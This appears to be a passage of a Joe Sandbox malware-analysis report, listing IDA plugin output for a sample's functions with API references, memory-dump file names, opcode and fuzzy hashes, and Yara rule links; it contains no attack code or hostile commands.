Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 011fb3d29d81ee2a48c340b31c058e830cb2de0aa8a8f1b536442cc042acb6a9
Instruction ID: cecfe9212f37ef11637a0121822a2f3d4de1369345b4aadb9b5500dcda8ef85d
Opcode Fuzzy Hash: 011fb3d29d81ee2a48c340b31c058e830cb2de0aa8a8f1b536442cc042acb6a9
Instruction Fuzzy Hash: 14428072A04B8692E710DF2AD4806A9BBB1FB88F84F548132CE4D67B64CF3ED045DB50

Function 00007FF735DE8310 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 00007FF735DE83FC

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: 92fc7557b2c98814aa9d08129f78a4d9b3354e1e789967e3c9c58bb83aad7564
Instruction ID: 68df5d6b66e5d3999a9c73473b9220dfd67bcc5c829752efceab20d7669716ca
Opcode Fuzzy Hash: 92fc7557b2c98814aa9d08129f78a4d9b3354e1e789967e3c9c58bb83aad7564
Instruction Fuzzy Hash: A6418122E18B818AE711CF78E4413ED73B1FF6975CF145725EE5C52A68EB38D1958310

Function 00007FF735DBA2F0 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF735DBA34A

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 844bc564f18ab6e447ff80629c7d833aa0e4fc83827fa9e10b2c97d86a031777
Instruction ID: 3438fe77e2d7dca65687006873c9b6f1825663485259d0ebb9c89cfc71719d12
Opcode Fuzzy Hash: 844bc564f18ab6e447ff80629c7d833aa0e4fc83827fa9e10b2c97d86a031777
Instruction Fuzzy Hash: EC613C6362C6E373D3565B3CA58127DAED5B789748F9C9234EE8EC2B45C93CDA005610

Function 00007FF735DBA040 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF735DBA0AA

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 2d8930c9d2281080a963238e1e3ebfee15b5d29d45d468a7e9c11233b0c1bea4
Instruction ID: 4537e41d58797aa2d6a70de79b03c94824e404053eca8a78d22f07682a693b70
Opcode Fuzzy Hash: 2d8930c9d2281080a963238e1e3ebfee15b5d29d45d468a7e9c11233b0c1bea4
Instruction Fuzzy Hash: F1615873B2C2E2A6D7158B38E445A79FF95E749B48F898235DE8CC3A04DE2ED400D710

Function 00007FF735DAF480 Relevance: 1.0, Instructions: 981COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c5757ae6ae7b4daa81122703bcb5fcf964f59aafab6591cd1aada6b428cdcb
Instruction ID: a0ff17f6017a1513c54ef9a1e97965551acd30517cfff99c73816466a804f5bc
Opcode Fuzzy Hash: 09c5757ae6ae7b4daa81122703bcb5fcf964f59aafab6591cd1aada6b428cdcb
Instruction Fuzzy Hash: FCB29636D287C7A6E356AE3680C02FAF751EF55F48F5C8775DE082E295EB3864809720

Function 00007FF735DB0E80 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37f7ce08d8c6b45e08b44b6dc8ba8b9d157a5bb2e7a3b41741c309ca2678d9e
Instruction ID: 9efb9250f3c4c02871cec4fdea84abf92296ac9125b71cbb9c3a888b55421f82
Opcode Fuzzy Hash: f37f7ce08d8c6b45e08b44b6dc8ba8b9d157a5bb2e7a3b41741c309ca2678d9e
Instruction Fuzzy Hash: 4D220C33E286C7B5E751AF7680812B9B391EF15F84F888735DE0E67294DF28B454A720

Function 00007FF735DB8570 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e104474c78f1fb26fcd280e49ad522ff84b4c64c25a3418b62c0064963724a
Instruction ID: 9493555d72dfce1eab0cf8d7f3d98dce2a7e2b336d3eca0169958c1275355e7d
Opcode Fuzzy Hash: 15e104474c78f1fb26fcd280e49ad522ff84b4c64c25a3418b62c0064963724a
Instruction Fuzzy Hash: 45F10833D38B8EA5E222A63354820B9F251AFBF7C4F5DEB32FD44355B1DB2861916610

Function 00007FF735DAE680 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910aaf321d9248f238fb3841b121a155a018bfe872771cbd91733aecdd3d697f
Instruction ID: 94c3f254ef4710ae2dac8e5f303eb319f9e7c07d113dc6d35fc06b653ed2ac7c
Opcode Fuzzy Hash: 910aaf321d9248f238fb3841b121a155a018bfe872771cbd91733aecdd3d697f
Instruction Fuzzy Hash: F7D1C933C2869F95E252B63740820B9F390EF7EB41F5CDB32E948361B1DB287585E610

Function 00007FF735DB0960 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6e4b4225c34743e85406f752a80e72e97e93a919f417bf9e938a8a2bf6c0df
Instruction ID: 16f3067fb28b09769eb9620ed19e88ca3e7f7a769be82e92b9848bbb73beb43c
Opcode Fuzzy Hash: 3c6e4b4225c34743e85406f752a80e72e97e93a919f417bf9e938a8a2bf6c0df
Instruction Fuzzy Hash: 0FA11872D2E34BB5E657A533708277CA6926F2AF84F5CCB36DD0C32492DF257094A610

Function 00007FF735DB6ED0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: debb758142006c1002a9e2611a0ab5ece942d81e251778199dbc3f8539cf710c
Instruction ID: c882782f177f7c281a7417423856f4d6cb1e7f50224708ed9807296fe26e9424
Opcode Fuzzy Hash: debb758142006c1002a9e2611a0ab5ece942d81e251778199dbc3f8539cf710c
Instruction Fuzzy Hash: 9BA1D032A28AD59EE701DF7A80812FCBBB0BB49349F548335EE4532A65DB396581DB10

Function 00007FF735DB4820 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: c75dc5be8975c3e353ddd26516b5fe4442507a95017cc8a681753ec2ad33bc74
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 4D5107A6A384B197DE50DF2AD8C16BC7792E74AB43FD48476D65882F91C12DC10AEF30

Function 00007FF735DC1690 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction ID: 77045e3551cf2156485f06e3a29473588495a2ef7a1df62027330f0877c980f6
Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction Fuzzy Hash: F241DB31E1D3AA95E521A5A351C0179A352AF6AF80FACC732ED8C27AC4DB38E4816640

Function 00007FF735DEA0C0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction ID: a60cf084d34e7c93b0f4cdce147f37945b46706101c817f8fff227ceed82787c
Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction Fuzzy Hash: 4741B433B2154187E78CCE3AC8566AD33A2F398300F85C23DDA0AC3385DA399905DB44

Function 00007FF735DA24F0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
Instruction ID: b19375246925e469fa629d3b0c4fcd4bdcdb80e8c7216e02bfa3e0d3ec1eb9ff
Opcode Fuzzy Hash: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
Instruction Fuzzy Hash: 93314737738A5757EB4C8639E932B796AD1F345700FC9A539EE4AC6AC2DB2DD4208310

Function 00007FF735DD3420 Relevance: 99.2, APIs: 66, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF735DD3450

Part of subcall function 00007FF735DE74F0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE752B
Part of subcall function 00007FF735DE74F0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE754A
Part of subcall function 00007FF735DE74F0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE757C
Part of subcall function 00007FF735DE74F0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7597
Part of subcall function 00007FF735DE74F0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE75E3

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD346F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD347F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3491
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34A1
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD34B3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34C3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD34D5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34E5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD34F6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3506
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3517
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3527
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3538
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3548
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD355A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD356A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD357B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD358B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD359D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35AD
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD35BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD35E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3602
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3612
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3624
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3634
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3646
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3656
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3668
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3678
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD368A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD369A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD36BC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD36DE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3700
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3712
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3722
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3734
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3744
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3756
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3766
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF735DD3779
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3789
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF735DD379C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD37BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD37E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3802
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3812
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3824
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3834
